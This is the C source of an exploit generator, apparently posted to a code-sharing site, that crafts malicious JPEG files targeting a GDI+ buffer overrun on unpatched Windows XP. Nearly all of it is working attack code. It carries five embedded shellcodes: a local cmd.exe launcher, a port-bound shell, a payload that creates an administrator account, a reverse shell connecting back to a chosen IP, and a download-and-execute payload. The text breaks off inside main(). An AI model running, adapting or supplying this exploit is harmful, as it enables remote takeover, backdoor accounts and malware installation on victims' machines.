Run Code
|
API
|
Code Wall
|
Misc
|
Feedback
|
Login
|
Theme
|
Privacy
|
Patreon
Title
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ // This is provided as proof-of-concept code only for educational // purposes and testing by authorized individuals with permission to // do so. // // .:[Sacred Desciples of Doom]:. // // GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru> // Greets to FoToZ who found the bug // Exploit will build a malicious JPG File // // Note: The headers here are only sample headers taken from a .JPG file, // with the FF FE 00 01 inserted in header1.We can use a 2500 bytes // space for shellcode. // //Greets to my friends: Wyk,SSarpele,sAD_sMile, Pimpa, Sacred, to my doggy Kiki :) //and to other Hackers from Republica Moldova. // // Tested on an unpatched WinXP SP1 Eng // // PS:I wass playing with this exploit couple of days ... when I whanted to post // it, HighT1mes already made an exploit with the same functionality ... // but with really not nice shellcodes, especialy the shellcode for adding an // administrator ... but http_shellcode was nice :) // you stay on #romhack , I stay on #moldhack heheh :) nick:Alladin` //++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #include <direct.h> #include <windows.h> #include <winbase.h> #include <winnls.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #pragma comment(lib, "ws2_32.lib") #define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+235+16)) = (port) #define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+221+16)) = (ip) #define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+228+16)) = (port) //++++++++++++++++++++++++++++++++++++++++++++++++++++++++ //pop up cmd.exe char shellcode1[]= "\x68" // push "cmd " "\x8B\xC4" // mov eax,esp "\x50" // push eax "\xB8\x44\x80\xC2\x77" // mov eax,77c28044h (address of system() on WinXP SP1) "\xFF\xD0"; // call eax //bind cmd.exe on a [port] defined by user unsigned char shellcode2[] = "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53" "\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4" "\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9" "\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d" "\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51" "\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54" "\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff" "\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a" "\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55" "\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c" "\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10" "\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c" "\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49" "\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff" "\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3" "\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55" "\x04\x31\xdb\x53\xff\xd0"; //It will create a new user account with the username="ASP32.NET" // and password of "ASP" and add it to the local group "Administrators" char shellcode3[]= "\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" "\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" "\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" "\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" "\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59" "\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68" "\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e" "\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0" "\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65" "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x41\x53\x50" "\x33\x32\x2e\x4e\x45\x54\x20\x41\x53\x50\x20\x2f\x41\x44\x44\x20" "\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75" "\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73" "\x20\x41\x53\x50\x33\x32\x2e\x4e\x45\x54\x20\x2f\x41\x44\x44\x00"; //connect back to a user defined [ip] and [port] unsigned char shellcode4[] = "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53" "\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4" "\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57" "\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89" "\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59" "\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50" "\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00" "\x01\x68\x02\x00\x22\x11\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59" "\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24\xac" "\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66" "\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c" "\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51" "\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89" "\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff" "\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31" "\xdb\x53\xff\xd0"; //donwload from http char shellcode5[]= "\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4" "\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26" "\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14" "\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E" "\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48" "\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB" "\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65" "\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17" "\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10" "\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1" "\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED" "\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13" "\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17" "\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17" "\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8" "\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE" "\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17" "\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17" "\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40" "\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8" "\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17" "\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17" "\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1" "\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7" "\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92" "\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A" "\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40" "\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50" "\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B" "\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65" "\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72" "\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B" "\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E" "\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72" "\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56" "\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65" "\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73" "\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27" "\x27\x39\x72\x6F\x72\x17" "m00!"; //add other shellcodes that you need here :) //+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ char header1[]= "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; char setNOPs1[]= "\xE8\x00\x00\x00\x00\x5B\x8D\x8B" "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"; char setNOPs2[]= "\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B" "\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"; char header2[]= "\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19" "\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B" "\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" "\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00" "\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01" "\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02" "\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01" "\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05" "\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0" "\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83" "\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03" "\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71" "\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92" "\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00" "\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC" "\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19" "\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF" "\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9" "\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F" "\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71" "\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96" "\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0" "\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23" "\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F" "\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA" "\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A" "\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B" "\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86" "\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5" "\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02" "\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47" "\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82" "\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55" "\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4" "\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84" "\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12" "\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B" "\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E" "\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B" "\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E" "\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97" "\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA" "\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2" "\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE" "\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7" "\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24" "\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B" "\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3" "\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E" "\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35" "\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD" "\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D" "\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35" "\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27" "\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B" "\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42" "\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2" "\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7" "\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46" "\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F" "\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20" "\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA" "\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F" "\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8" "\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45" "\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B" "\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82" "\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93" "\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F" "\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68" ; void show() { printf("_____________________________________________________________________\n\n"); printf(" .:[Sacred Desciples of Doom]:. \n"); printf(" GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru> \n"); printf(" Greets to FoToZ who found the bug \n"); printf(" These Exploit will build malicious JPG File \n\n"); printf("_____________________________________________________________________\n\n"); } void show_usage(char s[255]) { printf("_____________________________________________________________________\n\n"); printf(" .:[Sacred Desciples of Doom]:. \n"); printf(" GDI+ buffer overrun Exploit, Modified by Crypto <crypto@xaker.ru> \n"); printf(" Greets to FoToZ who found the bug \n"); printf(" These Exploit will build malicious JPG File \n\n"); printf("_____________________________________________________________________\n\n"); printf(" Usage: \n"); printf("\t%s 1: For lounching a local cmd.exe (not bound to the net)\n",s); printf("\t%s 2 [port]: For lounching cmd.exe on defined [port]\n",s); printf("\t%s 3: For creating a new user account\n",s); printf("\twith the username=\"ASP32.NET\"\n"); printf("\tand password=\"ASP\"and add it to the local group \"Administrators\"\n"); printf("\t%s 4 [ip] [port]: For making a conection to a defined [ip]\n",s); printf("\tand on defined [port] and bind cmd.exe on it\n"); printf("\t%s 5 [http]: For downloading and then executing a file\n",s); exit(1); } int main(int argc, char *argv[]) { FILE *fout; unsigned int i=0,j=0; unsigned short port=31337; unsigned long ip; WSADATA wsa; if (argc < 2) { printf("%d",sizeof(shellcode5)); show_usage(argv[0]); exit(1); } //pop up cmd.exe if (atoi(argv[1]) == 1) { show(); mkdir("Crypto"); fout=fopen("Crypto\\Crypto1.jpg","wb"); if( !fout ) { printf("\t\tErorr:Opening File ...\n"); exit(1); } for(i=0;i<sizeof(shellcode1)-1;i++) if( 0xD9FF == *(unsigned short *)&shellcode1[i] ) printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n"); printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode1)-1); j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3; for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout); for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout); for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout); for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs j=i; for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode1[i],fout); for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout); for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout); fprintf(fout,"\xFF\xD9"); printf("\t\tOk, Malicious JPG File Created ...\n\n"); fcloseall(); } //bind cmd.exe on a [port] if ((atoi(argv[1]) == 2)) { show(); mkdir("Crypto"); fout=fopen("Crypto\\Crypto2.jpg","wb"); if( !fout ) { printf("\t\tErorr:Opening File ...\n"); exit(1); } // lets initialize the socket library, couse we use htons function if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) { printf("We got a problem ... Winsock didn't initialize!!\n"); exit(1); } port = atoi(argv[2]); SET_PORTBIND_PORT(shellcode2, htons(port)); for(i=0;i<sizeof(shellcode2)-1;i++) if( 0xD9FF == *(unsigned short *)&shellcode2[i] ) printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n"); printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode2)-1); j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3; for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout); for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout); for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout); for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs j=i; for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode2[i],fout); for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout); for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout); fprintf(fout,"\xFF\xD9"); printf("\t\tOk, Malicious JPG File Created ...\n\n"); fcloseall(); WSACleanup(); } //Create User "ASP32.NET" if (atoi(argv[1]) == 3) { show(); mkdir("Crypto"); fout=fopen("Crypto\\Crypto3.jpg","wb"); if( !fout ) { printf("\t\tErorr:Opening File ...\n"); exit(1); } for(i=0;i<sizeof(shellcode3)-1;i++) if( 0xD9FF == *(unsigned short *)&shellcode3[i] ) printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n"); printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode3)-1); j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3; for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout); for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout); for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout); for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs j=i; for(i=0;i<sizeof(shellcode1)-1;i++) fputc(shellcode3[i],fout); for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout); for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout); fprintf(fout,"\xFF\xD9"); printf("\t\tOk, Malicious JPG File Created ...\n\n"); fcloseall(); } //reverse connect back if (atoi(argv[1]) == 4) { show(); mkdir("Crypto"); fout=fopen("Crypto\\Crypto2.jpg","wb"); if( !fout ) { printf("\t\tErorr:Opening File ...\n"); exit(1); } // let's initialize the socket library, couse we use htons function if (WSAStartup(MAKEWORD(1,1),&wsa)==SOCKET_ERROR) { printf("We got a problem ... Winsock didn't initialize!!\n"); exit(1); } ip = inet_addr(argv[2]); port = atoi(argv[3]); SET_CONNECTBACK_IP(shellcode4, ip); SET_CONNECTBACK_PORT(shellcode4, htons(port)); for(i=0;i<sizeof(shellcode4)-1;i++) if( 0xD9FF == *(unsigned short *)&shellcode4[i] ) printf("\t\tWarning: Shellcode Contains FFh D9h, Fix Shellcode\n"); printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode4)-1); j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3; for(i=0;i<sizeof(header1)-1;i++) fputc(header1[i],fout); for(i=0;i<sizeof(setNOPs1)-1;i++)fputc(setNOPs1[i],fout); for(i=0;i<sizeof(header2)-1;i++) fputc(header2[i],fout); for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs j=i; for(i=0;i<sizeof(shellcode2)-1;i++) fputc(shellcode4[i],fout); for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) fputc(0x90,fout); for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) fputc(setNOPs2[j],fout); fprintf(fout,"\xFF\xD9"); printf("\t\tOk, Malicious JPG File Created ...\n\n"); fcloseall(); WSACleanup(); } if (atoi(argv[1]) == 5) { show(); mkdir("Crypto"); fout=fopen("Crypto\\Crypto5.jpg","wb"); if( !fout ) { printf("\t\tErorr:Opening File ...\n"); exit(1); } strcat(shellcode5,argv[2]); strcat(shellcode5,"\x01"); for(i=0;i<sizeof(shellcode5)-1;i++) if( 0xD9FF == *(unsigned short *)&shellcode5[i] ) printf("\t\tWARNING: SHELLCODE CONTAINS FFh D9h, FIX UR SHELLCODE\n"); printf("\t\tShellcode Size is %u bytes\n", sizeof(shellcode5)-1); 